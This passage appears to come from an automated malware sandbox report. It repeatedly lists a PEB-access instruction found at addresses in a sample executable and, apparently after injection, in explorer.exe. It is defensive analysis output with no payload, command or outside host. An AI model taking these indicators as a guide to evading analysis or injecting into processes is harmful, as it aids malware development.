          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A0740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0495746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0496FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04962581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04932D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04961DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_0494D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_049FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04A08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_04943D34 mov eax, dword ptr fs:[00000030h]
